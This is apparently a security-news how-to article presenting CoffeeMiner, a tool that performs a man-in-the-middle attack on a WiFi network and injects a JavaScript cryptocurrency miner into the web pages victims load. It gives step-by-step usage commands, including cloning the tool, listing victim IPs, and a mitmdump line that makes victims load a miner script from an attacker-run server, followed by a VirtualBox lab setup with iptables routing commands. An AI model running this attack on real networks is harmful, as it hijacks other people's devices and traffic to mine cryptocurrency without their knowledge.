
Cryptocurrency Miners are in rise from previous year, nearly 600 millions computers are continually mining cryptoCurrency through their browsers without user’s knowledge. But this CoffeeMiner works differently through intercepting traffic and route to injected HTML pages for mining, that HTML pages contains javascript that force all devices which are connected to WiFi network to mine cryptocurrency for an attacker.
Concept:
- Performs a MITM attack to all selected victims
- Injects a js script in all the HTML pages requested by the victims
- The js script injected contains a cryptocurrency miner
- All the devices victims connected to the Lan network, will be mining for the CoffeeMiner
How To Use CoffeeMiner – WiFi MITM Cryptocurrency Mining Pool
First, We’re going to Download or Git CoffeeMiner.
$ git clone https://github.com/arnaucode/coffeeMiner.git
After that we’re going to run ‘install.sh‘ bash file.
- install.sh
$ bash install.sh
- edit victims.txt with one IP per line
- edit coffeeMiner.py, line 28, with the coffeeMiner httpserver IP:
os.system("~/.local/bin/mitmdump -s 'injector.py http://10.0.2.20:8000/script.js' -T")
When everything’s completed, we’re simply going to execute and run that coffeeMiner.py file.
- execute coffeeMiner.py
$ python3 coffeeMiner.py ipgateway
Instructions to setup VirtualBox scenario
In each machine, remember to setup the dns server, for example, in /etc/resolv.conf:
nameserver 8.8.8.8
Victim
- network adapter:
- Host-only Adapter
- /etc/network/interfaces:
auto lo iface lo inet loopback auto eth0 iface eth0 inet static address 10.0.2.20 netmask 255.255.255.0 gateway 10.0.2.15
Attacker
- network adapter:
- Host-only Adapter
- /etc/network/interfaces:
auto lo iface lo inet loopback auto eth0 iface eth0 inet static address 10.0.2.10 netmask 255.255.255.0 gateway 10.0.2.15
Gateway
- network adapter:
- Bridged Adapter
- Host-only Adapter
- /etc/network/interfaces:
auto lo iface lo inet loopback auto eth0 iface eth0 inet dhcp auto eth1 iface eth1 inet static address 10.0.2.15 netmask 255.255.255.0
Clean IPTABLES:
iptables --flush iptables --table nat --flush
Configure the Gateway machine as a router:
echo 1 > /proc/sys/net/ipv4/ip_forward iptables -t nat -A POSTROUTING -o eth0 -j MASQUERADE iptables -A FORWARD -i eth0 -o eth1 -j ACCEPT iptables -A FORWARD -i eth1 -o eth0 -j ACCEPT